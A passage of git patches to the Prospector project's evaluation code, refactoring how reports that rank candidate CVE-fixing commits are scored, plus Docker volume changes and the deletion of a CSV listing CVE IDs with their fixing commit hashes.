file reports_not_found = [] - if len(dataset) < 10: - logger.info( - f"Attempting to analyse: {[record[0] for record in dataset]}" - ) - else: - logger.info(f"Attempting to analyse {len(dataset)} CVEs.") - - #### Report Statistics - fixing_commit_found = 0 #### Data to insert into table results = { "high": [], - "COMMIT_IN_REFERENCE": 0, - "VULN_ID_IN_MESSAGE": 0, - "VULN_ID_IN_LINKED_ISSUE": 0, - "XREF_BUG": 0, - "XREF_GH": 0, + "COMMIT_IN_REFERENCE": [], + "VULN_ID_IN_MESSAGE": [], + "VULN_ID_IN_LINKED_ISSUE": [], + "XREF_BUG": [], + "XREF_GH": [], "medium": [], "low": [], - "not_found": 0, - "not_reported": 0, - "false_positive": 0, + "not_found": [], + "not_reported": [], + "false_positive": [], } - - # for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): - for record in dataset: + # Analyse old reports before rule names changed + # results = { + # "high": [], + # "COMMIT_IN_REFERENCE": [], + # "CVE_ID_IN_MESSAGE": [], + # "CVE_ID_IN_LINKED_ISSUE": [], + # "CROSS_REFERENCED_JIRA_LINK": [], + # "CROSS_REFERENCED_GH_LINK": [], + # "medium": [], + # "low": [], + # "not_found": [], + # "not_reported": [], + # "false_positive": [], + # } + + print(f"Analysing reports in {PROSPECTOR_REPORT_PATH}") + logger.info(f"Attempting to analyse {len(dataset)} CVEs.") + + for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS cve_id = record[0] - fixing_commits = record[4].split(",") + true_fixing_commits = record[4].split(",") - attempted_report_analysis += 1 + attempted_count += 1 try: - with open( - f"{PROSPECTOR_REPORT_PATH}{filename}/{cve_id}.json" - ) as file: + with open(f"{PROSPECTOR_REPORT_PATH}/{cve_id}.json") as file: # Get all commit IDs present in the report report_data = json.load(file) + _analyse_report( + results=results, + cve_id=cve_id, + report_data=report_data, + true_fixing_commits=true_fixing_commits, + ) + + analysed_reports_count += 1 + except FileNotFoundError: reports_not_found.append(cve_id) logger.debug(f"Couldn't find report for {cve_id}") continue - num_analysed_reports += 1 - - true_fixing_commits_in_report = get_true_fixing_commits_in_report( - report_data=report_data, - fixing_commits=fixing_commits, - ) - - # Fixing commit is not among the ranked commits of the report - if len(true_fixing_commits_in_report) == 0: - # check if it was a false positive - ranked_candidates = report_data["commits"] - if not ranked_candidates: - logger.info( - f"Report for {cve_id} does not contain any commits." - ) - results["not_reported"] += 1 - continue - - matched_rules = [ - rule["id"] - for rule in report_data["commits"][0]["matched_rules"] - if rule["id"] in STRONG_RULES - ] - if matched_rules: - logger.debug(f"Report for {cve_id} is a false positive.") - results["false_positive"] += 1 - # else the report does not contain the fixing commit at all - else: - logger.debug( - f"Report for {cve_id} does not contain fixing commit at all." - ) - results["not_reported"] += 1 - continue - - if len(true_fixing_commits_in_report) > 0: - fixing_commit_found += 1 - - #### Find the confidence & count strong rules - for i, commit in enumerate(report_data["commits"]): - logger.debug( - f"index: {i}, number of commits: {len(report_data['commits'])}" - ) - # First commit is fixing commit - if i == 0 and commit["commit_id"] in fixing_commits: - matched_rules = [rule["id"] for rule in commit["matched_rules"]] - # logger.debug(f"Matched rules: {matched_rules}") # Sanity Check - if STRONG_RULES[0] in matched_rules: - results[STRONG_RULES[0]] += 1 - results["high"].append((cve_id, STRONG_RULES[0])) - break - elif STRONG_RULES[1] in matched_rules: - results[STRONG_RULES[1]] += 1 - results["high"].append((cve_id, STRONG_RULES[1])) - break - elif STRONG_RULES[2] in matched_rules: - results[STRONG_RULES[2]] += 1 - results["high"].append((cve_id, STRONG_RULES[2])) - break - elif STRONG_RULES[3] in matched_rules: - results[STRONG_RULES[3]] += 1 - results["high"].append((cve_id, STRONG_RULES[3])) - break - elif STRONG_RULES[4] in matched_rules: - results[STRONG_RULES[4]] += 1 - results["high"].append((cve_id, STRONG_RULES[4])) - break - - for matched_rule in matched_rules: - if matched_rule in WEAK_RULES: - results["medium"].append((cve_id, matched_rule)) - break - break - - # Fixing commit among the first 10 (low confidence) - if i > 0 and i < 10 and commit["commit_id"] in fixing_commits: - results["low"].append(cve_id) - break - - # Commit not among the first 10 (not found) - if i >= 10: - results["not_found"] += 1 - break - #### Table Data (write to table) table_data = [] # Combine the two Cross Reference rules into one count results["XREF_BUG"] += results["XREF_GH"] results.pop("XREF_GH") + # Analyse old reports before rule names changed + # results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] + # results.pop("CROSS_REFERENCED_GH_LINK") + + logger.info(f"Ran analysis on {PROSPECTOR_REPORT_PATH}.") for key, v in results.items(): if type(v) == list: v = len(v) - logger.info(f"{key}: {v}") - table_data.append([v, round(v / num_analysed_reports * 100, 2)]) + logger.info(f"\t{v}\t{key}") + table_data.append([v, round(v / analysed_reports_count * 100, 2)]) update_summary_execution_table( - "MVI", - table_data, - str(num_analysed_reports), - f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", + mode="MVI", + data=table_data, + total=str(analysed_reports_count), + filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", ) logger.info( - f"Analysed {num_analysed_reports}, couldn't find reports for {len(reports_not_found)} out of {attempted_report_analysis} analysis attempts." - ) - logger.info( - f"Fixing commit among ranked commits in report: {fixing_commit_found}" - ) - logger.info( - f"Fixing commit not among ranked commits in report: {results['not_found']}" - ) - logger.info( - f"Found {len(results['high'])} commits with high confidence, {len(results['medium'])} commits with medium confidence and {len(results['low'])} commits with low confidence." + f"Analysed {analysed_reports_count}, couldn't find reports for {len(reports_not_found)} out of {attempted_count} analysis attempts." ) logger.debug(f"Strong rules matching: {results['high']}") + logger.debug( + f"CVEs matching Commit in reference: {[item[0] for item in results['high'] if item[1] == 'COMMIT_IN_REFERENCE']}" + ) logger.debug(f"Weak rules matching: {results['medium']}") - logger.debug(f"Fixing commit among first 10 (low conf): {results['low']}") + logger.debug(f"False positive reports: {results['false_positive']}") + logger.debug(f"Not found reports: {results['not_found']}") -def get_true_fixing_commits_in_report( - report_data, - fixing_commits: List[str], -): - """Return the list of true fixing commits mentioned in the Prospector - report. - """ - ranked_candidates = [ - commit["commit_id"] for commit in report_data["commits"] - ] - true_fixing_commits_in_report = [ - commit for commit in ranked_candidates if commit in fixing_commits - ] - - return true_fixing_commits_in_report - - -def update_confidence_and_strong_rules( - i: int, - commit, - cve_id, - fixing_commits: List, - confidence: dict[List], - strong_rules_count, -): - matched_rules = [rule["id"] for rule in commit["matched_rules"]] - # logger.debug(f"Matched rules: {matched_rules}") # Sanity Check - - # Fixing commit among the first 10 - if i > 0 and commit["commit_id"] in fixing_commits: - confidence["low"].append(cve_id) - return confidence, strong_rules_count - - # First commit is fixing commit - if i == 0: - for matched_rule in matched_rules: - if matched_rule in STRONG_RULES: - strong_rules_count[matched_rule] += 1 - confidence["high"].append((cve_id, matched_rule)) - return confidence, strong_rules_count - - if matched_rule in WEAK_RULES: - confidence["medium"].append((cve_id, matched_rule)) - return confidence, strong_rules_count +def _analyse_report( + results: dict, cve_id: str, report_data, true_fixing_commits: list +) -> dict: + """Analyzes a single Prospector report for a given CVE and updates the + results dictionary. + Params: + results (dict): The current results dictionary to be updated. + cve_id (str): The CVE identifier for the current report. + report_data (dict): The data from the current Prospector report. + true_fixing_commits (list): A list of known true fixing commit hashes -def analyze_prospector(filename: str): # noqa: C901 - """Analyses Prospector's reports.""" - - file = INPUT_DATA_PATH + filename + ".csv" - dataset = load_dataset(file) - - missing = [] - skipped = 0 - - results = { - "COMMIT_IN_REFERENCE": set(), - "CVE_ID_IN_MESSAGE": set(), - "CVE_ID_IN_LINKED_ISSUE": set(), - "CROSS_REFERENCE": set(), - "medium_confidence": set(), - "low_confidence": set(), - "not_found": set(), - "not_reported": set(), # Commit does not appear in the report - "false_positive": set(), - "real_false_positive": set(), - } - rulescount = defaultdict(lambda: 0) - - # For each CSV in the input dataset, check its report - logger.info("Checking reports") - for itm in dataset: - try: - ( - is_fix, - has_certainty, - commit_id, - exists, - position, - ranks, - rules, - ) = check_report( - PROSPECTOR_REPORT_PATH + filename, itm[0], itm[4] - ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - - results, rulescount, skipped = write_matched_rules( - results, - rulescount, - skipped, - itm, - is_fix, - has_certainty, - commit_id, - exists, - position, - ranks, - rules, - ) - - except FileNotFoundError: - print(f"No report for {itm[0]}") - continue - - print("Saved results to matched_rules.tex") - logger.debug(f"Count for each rule: {rulescount}") - # print( - # ",".join( - # results["not_reported"] - # | results["not_found"] - # | results["false_positive"] - # | results["low_confidence"] - # | results["medium_confidence"] - # | results["CVE_ID_IN_LINKED_ISSUE"] - # | results["CROSS_REFERENCE"] - # | results["CVE_ID_IN_MESSAGE"] - # ) - # ) - - total = len(dataset) - skipped - logger.debug(f"Analysed {total} reports.") - rulescount = dict(sorted(rulescount.items())) - - make_rules_plot(rulescount) - - # Save the results to the Latex table - table_data_categories = [] - # Calculate the sum of high confidence results: COMMIT_IN_REFERENCE + CVE_ID_IN_MESSAGE + CVE_ID_IN_LINKED_ISSUE + CROSS_REFERENCE - num_high_confidence = sum( - [ - len(v) - for k, v in results.items() - if k - in [ - "CVE_ID_IN_MESSAGE", - "CVE_ID_IN_LINKED_ISSUE", - "CROSS_REFERENCE", - "COMMIT_IN_REFERENCE", - ] - ] - ) - # First row - table_data_categories.append( - [num_high_confidence, round(num_high_confidence / total * 100, 2)] - ) - # Middle rows - for key, value in results.items(): - logger.debug( - f"Key: {key}, Length of value: {len(value)}" - ) # Sanity Check - table_data_categories.append( - [len(value), round(len(value) / total * 100, 2)] - ) - - update_summary_execution_table( - "MVI", - table_data_categories, - str(total), - f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", + Returns: + dict: The updated results dictionary. + """ + true_fixing_commits_in_report = _get_true_fixing_commits_in_report( + report_data=report_data, + fixing_commits=true_fixing_commits, ) - total_check = sum([len(x) for x in results.values()]) - print(f"\nAnalysed {total_check} reports") # Sanity Check - - if total_check != total: - print("ERROR: Some CVEs are missing") - - return missing - - -def build_table_row(matched_rules): - rules_list = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CVE_ID_IN_LINKED_ISSUE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_JIRA", - "GITHUB_ISSUE_IN_MESSAGE", - "JIRA_ISSUE_IN_MESSAGE", - "COMMIT_HAS_TWINS", - ] - out = [] - for id in rules_list: - if id in matched_rules: - out.append("/checkmark") + # Fixing commit is not among the candidates of the report + if len(true_fixing_commits_in_report) == 0: + # check if there are any candidates at all + ranked_candidates = report_data["commits"] + if not ranked_candidates: + logger.info(f"Report for {cve_id} does not contain any commits.") + # else the report does not contain the fixing commit at all else: - out.append("") - return out - - -def write_matched_rules( - results: dict, - rulescount, - skipped, - itm, - is_fix, - has_certainty, - commit_id, - exists, - position, - ranks, - rules, -): - with open(ANALYSIS_RESULTS_PATH + "matched_rules.tex", "a+") as f: - # if the commit doesn't exist? - if not is_fix and not exists and position < 0: - skipped += 1 - return results, rulescount, skipped - - # Commit is not reported (in the whole report, the fixing commit doesn't show up) - if not is_fix and not has_certainty and commit_id and position < 0: - results["not_reported"].add(itm[0]) - logger.debug(f"Commit was not reported: {itm[0]}") - return results, rulescount, skipped - - # False positives - if not is_fix and has_certainty: - results["false_positive"].add(itm[0]) - update_false_positives(itm) logger.debug( - f"Commit {itm[0]} was a false positive (high confidence but not fixing commit)." + f"Report for {cve_id} does not contain fixing commit at all." ) - return results, rulescount, skipped - - # Commit not found (commit was not in the first 10 ranked candidates of the report) - if is_fix and not has_certainty and position >= 10: - results["not_found"].add(itm[0]) - - # Commit is fixing commit and has certainty - if is_fix and has_certainty: # and 0 <= position < 10: - f.write( - f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" - ) - - results[has_certainty].add(itm[0]) - - elif is_fix and not has_certainty and position == 0: - f.write( - f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" - ) - results["medium_confidence"].add(itm[0]) - - elif is_fix and not has_certainty and 0 < position < 10: - results["low_confidence"].add(itm[0]) - f.write( - f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" - ) - - for rule in rules: - rulescount[rule] += 1 - if results.get(rule, None): - results[rule].add(commit_id) - - return results, rulescount, skipped - - -def make_rules_plot(rulescount): - plt.rcParams["figure.autolayout"] = True - plt.rcParams["savefig.dpi"] = 300 - sns.set_style("whitegrid") - colors = [ - ( - "#ffa600" - if id - in ( - "COMMIT_IN_REFERENCE", - "CROSS_REFERENCED_GH_LINK", - "CROSS_REFERENCED_JIRA_LINK", - "CVE_ID_IN_LINKED_ISSUE", - "CVE_ID_IN_MESSAGE", - ) - else "#003f5c" + # Check if it's a false positive + strong_matched_rules = [ + rule["id"] + for rule in report_data["commits"][0]["matched_rules"] + if rule["id"] in STRONG_RULES + ] + if strong_matched_rules: + results["false_positive"].append(cve_id) + return results + + results["not_reported"].append(cve_id) + return results + + #### Find the confidence & count strong rules + for i, commit in enumerate(report_data["commits"]): + # Get candidate id and also twins ids + candidate_and_twins = _get_candidate_and_twins_ids(commit) + candidates_in_fixing_commits = _list_intersection( + candidate_and_twins, true_fixing_commits ) - for id in rulescount.keys() - ] - ss = sns.barplot( - x=list(rulescount.keys()), - y=list(rulescount.values()), - hue=list(rulescount.keys()), - palette=colors, - width=0.6, - legend=False, - ) - plt.xticks(rotation="vertical") - # ss.set_xscale("log", base=2) - # ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - # ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024], rot) - - # ss.set_xticks(range(0, 800, 100)) - ss.tick_params(axis="x", labelsize=8) - # plt.show() - plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/project-kb.png") - # for rule, count in rulescount.items(): - # print(f"{rule}: {count}") # Sanity Check + # First candidate is one of the fixing commits + if i == 0 and candidates_in_fixing_commits: + matched_rules = {rule["id"] for rule in commit["matched_rules"]} + # check for strong rules + for rule in STRONG_RULES: + if rule in matched_rules: + results[rule].append(cve_id) + results["high"].append(cve_id) + return results -def sum_relevances(list_of_rules): - """Calculates the sum of relevance scores for a list of matched rules.""" - return sum([r["relevance"] for r in list_of_rules]) + # check for weak rules + weak_matched_rules = matched_rules.intersection(WEAK_RULES) + if weak_matched_rules: + results["medium"].append(cve_id) + return results + # Fixing commit among the first 10 (low confidence) + if i > 0 and i < 10 and candidates_in_fixing_commits: + results["low"].append(cve_id) + return results -def check_report_get_rules(dataset, cve, fixing_commits): - """Retrieves the matched rules and commit information for a given CVE and a - list of fixing commits. + # Commit not among the first 10 (not found) + if i >= 10: + results["not_found"].append(cve_id) + return results - Args: - dataset (str): The path to the dataset directory. - cve (str): The CVE identifier. - fixing_commits (list): A list of commit IDs that are fixing the vulnerability. - Returns: - tuple: A tuple containing the following elements: - - A list of matched rule IDs - - The position (index) of the fixing commit in the list of commits - - The sum of relevance scores for the matched rules - - The commit ID of the fixing commit - """ - with open(f"{dataset}/{cve}.json", "r") as file: - data = json.load(file) - # not_fixing = [ - # commit - # for commit in data["commits"] - # if commit["commit_id"] not in fixing_commits - # ] - # if len(not_fixing) == 0: - # return [], 0, 0, 0 - # return ( - # [r["id"] for r in not_fixing[0]["matched_rules"]], - # 1, - # 1, - # not_fixing[0]["commit_id"], - # ) - for i, commit in enumerate(data["commits"]): - if commit["commit_id"] in fixing_commits: - return ( - [r["id"] for r in commit["matched_rules"]], - i + 1, - sum_relevances(commit["matched_rules"]), - commit["commit_id"], - ) - - if "twins" in commit: - for twin in commit["twins"]: - if twin[1] in fixing_commits: - return ( - [r["id"] for r in commit["matched_rules"]], - i + 1, - sum_relevances(commit["matched_rules"]), - commit["commit_id"], - ) - # return ( - # [r["id"] for r in commit["matched_rules"]], - # i + 1, - # sum_relevances(commit["matched_rules"]), - # commit["commit_id"], - # ) - return None, None, None, None - - -def has_certainty(cve, commit): - """Checks if a list of matched rules contains any strong (high-certainty) rules.""" - rules = commit["matched_rules"] - if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): - print(cve) - return "COMMIT_IN_REFERENCE" - if any(rule["id"] == "VULN_ID_IN_MESSAGE" for rule in rules): - return "CVE_ID_IN_MESSAGE" - if any(rule["id"] in ("XREF_BUG", "XREF_GH") for rule in rules): - return "CROSS_REFERENCE" - if any(rule["id"] == "VULN_ID_IN_LINKED_ISSUE" for rule in rules): - return "CVE_ID_IN_LINKED_ISSUE" - - return False - - -def get_first_commit_relevance(data): - if len(data["commits"]) == 0: - return -1 - else: - return sum_relevances(data["commits"][0]["matched_rules"]) - - -def is_fixing_commit(commit, fixing_commits): - """Returns whether a commit is in a list of true fixing commits.""" - return commit["commit_id"] in fixing_commits or any( - twin[1] in fixing_commits for twin in commit.get("twins", []) - ) - - -def get_commit_info(cve, commit, index, relevance_first_commit, relevance_next): - return ( - True, - has_certainty(cve, commit), - commit["commit_id"], - True, - index, - [ - index + 1, - sum_relevances(commit["matched_rules"]), - relevance_first_commit, - relevance_next, - ], - [r["id"] for r in commit["matched_rules"]], - ) - - -def get_non_fixing_commit_info(cve, commit, index, score_first): - cert = has_certainty(cve, commit) - if cert != 0: - return ( - False, - cert, - commit["commit_id"], - True, - index, - [ - sum_relevances(commit["matched_rules"]), - score_first, - -1, - ], - [r["id"] for r in commit["matched_rules"]], - ) - return None - - -def check_report(dataset, cve, fixing_commits): - """This function checks the report for a given CVE and list of fixing commits. - - Args: - dataset (str): The path to the dataset directory. - cve (str): The CVE identifier. - fixing_commits (list): A list of commit IDs that are fixing the vulnerability. - - Returns: - tuple: A tuple containing the following elements: - - A boolean indicating if the commit is a fixing commit - - The certainty level of the matched rules (a string or 0) - - The commit ID (or None if no commit is found) - - A boolean indicating if the commit exists - - The position (index) of the commit (-1 if no commit is found) - - A list containing the position, relevance score, score_first, and relevance_next (or None if no commit is found) - - A list of matched rule IDs +def _get_true_fixing_commits_in_report( + report_data, + fixing_commits: List[str], +): + """Return the list of true fixing commits mentioned in the Prospector + report. Also takes twins into consideration. """ - try: - with open(f"{dataset}/{cve}.json", "r") as file: - data = json.load(file) - - relevance_first_commit = get_first_commit_relevance(data) - logger.debug(f"{cve}") - logger.debug(f"Score first: {relevance_first_commit}") - - for index, commit in enumerate(data["commits"]): - relevance_next = -1 - if index > 0: - relevance_next = sum_relevances( - data["commits"][index - 1]["matched_rules"] - ) - - if is_fixing_commit(commit, fixing_commits): - if index == 0: - relevance_first_commit = -1 - commit_info = get_commit_info( - cve, - commit, - index, - relevance_first_commit, - relevance_next, - ) - logger.debug(f"Fixing Commit Info: {commit_info}") - - return commit_info - - for index, commit in enumerate(data["commits"]): - commit_info = get_non_fixing_commit_info( - cve, commit, index, relevance_first_commit - ) - if commit_info: - logger.debug(f"Non-fixing Commit Info: {commit_info}") - return commit_info + ranked_candidates = [] + for commit in report_data["commits"]: + ranked_candidates.append(commit["commit_id"]) + if "twins" in commit: + ranked_candidates.extend([twin[1] for twin in commit["twins"]]) - return (False, 0, True, True, -1, None, []) + true_fixing_commits_in_report = [ + commit for commit in ranked_candidates if commit in fixing_commits + ] - except FileNotFoundError: - return False, 0, None, False, -1, None, [] + return true_fixing_commits_in_report -def process_json_report(dataset, cve, commits): - """This function processes the JSON report for a given CVE and list of commits. +def _get_candidate_and_twins_ids(commit): + """Combines the candidate's and its twins (if present) IDs into one list + and returns it.""" + ids = [commit["commit_id"]] + if "twins" in commit: + ids.extend([twin[1] for twin in commit["twins"]]) - Args: - dataset (str): The path to the dataset directory. - cve (str): The CVE identifier. - commits (list): A list of commit IDs. + return ids - Returns: - tuple: A tuple containing the following elements: - - A boolean indicating if the commit exists - - A list containing the following elements: - - The CVE ID - - The position (index) of the commit - - The sum of relevance scores for the matched rules - - The number of commits with the same relevance score - - The sum of relevance scores for the first commit - - The sum of relevance scores for the next commit with a higher score - """ - out = [] - exists = True - try: - with open(f"{dataset}/{cve}/{cve}.json", "r") as file: - data = json.load(file) - processed_commits = {} - for i, commit in enumerate(data["commits"]): - processed_commits[commit["commit_id"]] = [ - sum_relevances(commit["matched_rules"]), - i + 1, - ] - - if commit["commit_id"] in commits: - processed_commits.pop(commit["commit_id"]) - current = [ - cve, - i + 1, - sum_relevances(commit["matched_rules"]), - None, - None, - None, - ] - current[3] = len( - [ - k - for k, v in processed_commits.items() - if v[0] == current[2] - ] - ) - if i > 0: - current[4] = sum_relevances( - data["commits"][0]["matched_rules"] - ) - r_next = 0 - for j in range(i, -1, -1): - r_next = sum_relevances( - data["commits"][j]["matched_rules"] - ) - if r_next > current[2]: - current[5] = r_next - break - out = current - exists = True - break - except FileNotFoundError: - exists = False - return exists, out - -def analyze_rules_usage(dataset_path: str, cve: str = ""): - """This function analyzes the usage of rules across a dataset.""" - dataset = load_dataset(dataset_path) - rules: Dict[str, int] = {} - commit_count = 0 - cve_count = 0 - for itm in dataset: - cve_count += 1 - with open(f"{dataset_path[:-4]}/{itm[0]}/{itm[0]}.json", "r") as file: - data = json.load(file) - for commit in data["commits"]: - commit_count += 1 - for rule in commit["matched_rules"]: - if rule["id"] in rules: - rules[rule["id"]] += 1 - else: - rules[rule["id"]] = 1 - - sorted_rules = { - k: v - for k, v in sorted( - rules.items(), key=lambda item: item[1], reverse=True - ) - } - print(f"\nTotal commits: {commit_count}") - print(f"Total cves: {cve_count}\n") - for k, v in sorted_rules.items(): - print(f"{k}: {v}") +def _list_intersection(list1, list2): + """Returns the common elements of two lists.""" + return list(set(list1) & set(list2)) def analyse_statistics(filename: str): # noqa: C901 @@ -1029,12 +413,12 @@ def count_existing_reports(data_filepath): missing_reports = [] + print(f"Counting reports in {PROSPECTOR_REPORT_PATH}") + for record in dataset: cve_id = record[0] - if os.path.isfile( - f"{PROSPECTOR_REPORT_PATH}{data_filepath}/{cve_id}.json" - ): + if os.path.isfile(f"{PROSPECTOR_REPORT_PATH}/{cve_id}.json"): continue else: missing_reports.append(cve_id) From 7cb6e57da53e9c55594cb676d176db483e0d0121 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:48:01 +0000 Subject: [PATCH 071/130] set parameter so that already cloned repos are not cloned again --- prospector/core/prospector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 20b269e41..108de1655 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -121,7 +121,7 @@ def prospector( # noqa: C901 repository = Git(repository_url, cache_path=git_cache) with ConsoleWriter("Git repository cloning") as console: - repository.clone() + repository.clone(skip_existing=True) tags = repository.get_tags() From 634b404412914328baf680fa01f09a6ef8570393 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:49:08 +0000 Subject: [PATCH 072/130] sets using LLMs to infer repo URLs to false in any case and refactors code to make it cleaner --- prospector/evaluation/dispatch_jobs.py | 109 ++++++++++++------------- 1 file changed, 52 insertions(+), 57 deletions(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 539bb293f..1cc167358 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -24,7 +24,55 @@ def to_latex_table(): print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") # noqa: W605 -def run_prospector_and_generate_report( +def dispatch_prospector_jobs(filename: str, selected_cves: str): + """Dispatches jobs to the queue.""" + + dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") + dataset = dataset[:100] + + # Only run a subset of CVEs if the user supplied a selected set + if len(selected_cves) != 0: + dataset = [c for c in dataset if c[0] in selected_cves] + + logger.debug(f"Enabled rules: {prospector_config.enabled_rules}") + logger.info(f"Prospector settings: {prospector_config.enabled_rules}") + + dispatched_jobs = 0 + for cve in dataset: + # Skip already existing reports + if os.path.exists(f"{PROSPECTOR_REPORT_PATH}/{cve[0]}.json"): + continue + + dispatched_jobs += 1 + + # Send them to Prospector to run + with Connection(redis.from_url(prospector_config.redis_url)): + queue = Queue(default_timeout=3600) + + job = Job.create( + _run_prospector_and_generate_report, + kwargs={ + "cve_id": cve[0], + "version_interval": cve[2], + "report_type": "json", + "output_file": f"{PROSPECTOR_REPORT_PATH}/{cve[0]}.json", + "repository_url": ( + cve[1] + if not prospector_config.llm_service.use_llm_repository_url + else None + ), + }, + description="Prospector Job", + id=cve[0], + ) + + queue.enqueue_job(job) + + logger.info(f"Dispatched {dispatched_jobs} jobs.") + print(f"Dispatched {dispatched_jobs} jobs.") + + +def _run_prospector_and_generate_report( cve_id, version_interval, report_type: str, @@ -42,7 +90,7 @@ def run_prospector_and_generate_report( "backend_address": prospector_config.backend, "git_cache": prospector_config.git_cache, "limit_candidates": prospector_config.max_candidates, - "use_llm_repository_url": prospector_config.llm_service.use_llm_repository_url, + "use_llm_repository_url": False, "enabled_rules": prospector_config.enabled_rules, } @@ -77,62 +125,9 @@ def run_prospector_and_generate_report( return f"Ran Prospector on {cve_id}" -def dispatch_prospector_jobs(filename: str, selected_cves: str): - """Dispatches jobs to the queue.""" - - dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[100:] - - # Only run a subset of CVEs if the user supplied a selected set - if len(selected_cves) != 0: - dataset = [c for c in dataset if c[0] in selected_cves] - - logger.debug(f"Enabled rules: {prospector_config.enabled_rules}") - logger.info(f"Prospector settings: {prospector_config.enabled_rules}") - - dispatched_jobs = 0 - for cve in dataset: - # Skip already existing reports - if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): - continue - - dispatched_jobs += 1 - - # Send them to Prospector to run - with Connection(redis.from_url(prospector_config.redis_url)): - queue = Queue(default_timeout=3600) - - job = Job.create( - run_prospector_and_generate_report, - kwargs={ - "cve_id": cve[0], - "version_interval": cve[2], - "report_type": "json", - "output_file": f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", - "repository_url": ( - cve[1] - if not prospector_config.llm_service.use_llm_repository_url - else None - ), - }, - description="Prospector Job", - id=cve[0], - ) - - queue.enqueue_job(job) - - registry = queue.failed_job_registry - for job_id in registry.get_job_ids(): - job = Job.fetch(job_id) - print(job_id, job.exc_info) - - # print(f"Dispatched job {cve[0]} to queue.") # Sanity Check - - logger.info(f"Dispatched {dispatched_jobs} jobs.") - print(f"Dispatched {dispatched_jobs} jobs.") - - def empty_queue(): + """Remove all jobs from the queue. Attention: this does not stop jobs that + are currently executing.""" with Connection(redis.from_url(prospector_config.redis_url)): queue = Queue("default") From 8578dfd96cf0e60b1a61c62566587f329223e682 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:54:32 +0000 Subject: [PATCH 073/130] adds two more folders to share between the container and host for the reports with mvi --- prospector/docker-compose.yml | 2 + .../evaluation/data/input/steady_dataset.csv | 841 ------------------ 2 files changed, 2 insertions(+), 841 deletions(-) delete mode 100644 prospector/evaluation/data/input/steady_dataset.csv diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 7e4becdc4..6437bb75e 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -31,6 +31,8 @@ services: - ./data_sources/reports:/app/data_sources/reports - ./evaluation/data/reports_with_llm/:/app/evaluation/data/reports_with_llm # Only relevant for evaluation data - ./evaluation/data/reports_without_llm/:/app/evaluation/data/reports_without_llm # Only relevant for evaluation data + - ./evaluation/data/reports_without_llm_mvi/:/app/evaluation/data/reports_without_llm_mvi # Only relevant for evaluation data + - ./evaluation/data/reports_with_llm_mvi/:/app/evaluation/data/reports_with_llm_mvi # Only relevant for evaluation data - ./../../../data/gitcache:/tmp/gitcache # LASCHA: check that this is correct depends_on: - redis diff --git a/prospector/evaluation/data/input/steady_dataset.csv b/prospector/evaluation/data/input/steady_dataset.csv deleted file mode 100644 index b8582954d..000000000 --- a/prospector/evaluation/data/input/steady_dataset.csv +++ /dev/null @@ -1,841 +0,0 @@ -ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS -CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;0e14d6a42cc965e23bb1b40f04b4c002dc173b88; -CVE-2020-9484;https://github.com/apache/tomcat;None:None;False;3aa8f28db7efb311cdd1b6fe15a9cd3b167a222,53e30390943c18fca0c9e57dbcc14f1c623cfd0,bb33048e3f9b4f2b70e4da2e6c4e34ca89023b1,ec08af18d0f9ddca3f2d800ef66fe7fd20afef2; -CVE-2021-21274;https://github.com/matrix-org/synapse;None:None;False;ff5c4da1289cb5e097902b3e55b771be342c29d6; -CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;24bc5ade80560cedb9300940d2b398163ab0dc6; -CVE-2017-4991;https://github.com/cloudfoundry/uaa;None:None;False;7db5e5846961e08295b1ef7af909f267eebe5da,eb3f86054489039e11eabd54a8ec9a46c22abfc; -CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; -CVE-2018-7537;https://github.com/django/django;None:None;False;a91436360b79a6ff995c3e5018bcc666dfaf153; 